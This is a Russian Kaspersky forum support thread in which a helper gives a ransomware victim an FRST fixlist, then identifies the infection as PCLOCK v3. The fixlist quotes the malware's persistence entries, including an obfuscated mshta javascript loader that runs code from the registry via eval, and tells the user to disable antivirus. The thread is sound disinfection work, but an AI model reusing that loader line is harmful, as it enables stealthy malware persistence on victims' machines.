Шифровальщик перешифровал все файлы

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

Временно выгрузите антивирус, файрволл и прочее защитное ПО.

Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CMD: wmic /Namespace:\\root\default Path SystemRestore Call Enable "%SystemDrive%"
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\...\Run: [**gqrgnhmzgq<*>] => "C:\Users\Dexp-PC\AppData\Local\0dcc1d\fef0f1.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\...\Run: [11a489eb] => C:\Users\Dexp-PC\AppData\Roaming\Microsoft\Crypto\syscop.exe
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\Software\Classes\ac5768: "C:\WINDOWS\system32\mshta.exe" "javascript:zW8Uc3="rpYk7";g4A=new ActiveXObject("WScript.Shell");hTYZ7Kbf="FmnxYuv";h8rwO8=g4A.RegRead("HKCU\\software\\rhnkcizp\\iorhejef");v8IaG3="QwsuJeO";eval(h8rwO8);ce6YQ="h037CcU";" <===== ATTENTION
C:\Users\Dexp-PC\AppData\Local\0dcc1d
Folder: C:\FRST\Quarantine

Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
Обратите внимание, что компьютер будет перезагружен.
Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

29 ноября, 2016

C:\Users\Dexp-PC\AppData\Roaming\Microsoft\Crypto\syscop.exe
Антивирус не удалял этот файл?

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
Временно выгрузите антивирус, файрволл и прочее защитное ПО.
Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CMD: wmic /Namespace:\\root\default Path SystemRestore Call Enable "%SystemDrive%"
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\...\Run: [**gqrgnhmzgq<*>] => "C:\Users\Dexp-PC\AppData\Local\0dcc1d\fef0f1.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\...\Run: [11a489eb] => C:\Users\Dexp-PC\AppData\Roaming\Microsoft\Crypto\syscop.exe
HKU\S-1-5-21-3484740254-580438617-1479064105-1001\Software\Classes\ac5768: "C:\WINDOWS\system32\mshta.exe" "javascript:zW8Uc3="rpYk7";g4A=new ActiveXObject("WScript.Shell");hTYZ7Kbf="FmnxYuv";h8rwO8=g4A.RegRead("HKCU\\software\\rhnkcizp\\iorhejef");v8IaG3="QwsuJeO";eval(h8rwO8);ce6YQ="h037CcU";" <===== ATTENTION
C:\Users\Dexp-PC\AppData\Local\0dcc1d
Folder: C:\FRST\Quarantine
Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

Обратите внимание, что компьютер будет перезагружен.

Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

Нет, антивирус не удалял файл C:\Users\Dexp-PC\AppData\Roaming\Microsoft\Crypto\syscop.exe

Фикслог в приложении.

Каким образом можно восстановить файлы?

Благодарю за ответ.

Fixlog.txt

29 ноября, 2016

Для начала бы понять, чем зашифрованы файлы.

Прикрепите к сообщению C:\Users\Dexp-PC\Desktop\Your files are locked !.txt

+ Вспоминайте что запускали.

29 ноября, 2016

Для начала бы понять, чем зашифрованы файлы.

Прикрепите к сообщению C:\Users\Dexp-PC\Desktop\Your files are locked !.txt

+ Вспоминайте что запускали.

Файл прикрепил.

Из исполняемых файлов ничего не запускал накануне беды, кроме установочник jivosite.ru

Благодарю за соучастие и помощь в проблеме.

Your files are locked !.txt

29 ноября, 2016

Что-то все таки похоже запускали. В общем, файлы зашифрованы с помощью Ransomware PCLOCK 3 версии. Думаю в техподдержке помогут с ним.

Пишите запрос https://forum.kasperskyclub.ru/index.php?showtopic=48525

29 ноября, 2016

Что-то все таки похоже запускали. В общем, файлы зашифрованы с помощью Ransomware PCLOCK 3 версии. Думаю в техподдержке помогут с ним.

Пишите запрос https://forum.kasperskyclub.ru/index.php?showtopic=48525

Большое Вам спасибо за помощь!

Очень рад, что в наше время ещё есть такие небезучастные люди.

Благодарю за посильную помощь!

Шифровальщик перешифровал все файлы

Рекомендуемые сообщения

Vitaliy Arbuzov

Ссылка на комментарий

Поделиться на другие сайты

mike 1

Ссылка на комментарий

Поделиться на другие сайты

Vitaliy Arbuzov

Ссылка на комментарий

Поделиться на другие сайты

mike 1

Ссылка на комментарий

Поделиться на другие сайты

Vitaliy Arbuzov

Ссылка на комментарий

Поделиться на другие сайты

mike 1

Ссылка на комментарий

Поделиться на другие сайты

Vitaliy Arbuzov

Ссылка на комментарий

Поделиться на другие сайты

mike 1

Ссылка на комментарий

Поделиться на другие сайты

Vitaliy Arbuzov

Ссылка на комментарий

Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Сайт

Активность

Магазин

Поддержка

Kaspersky Support Forum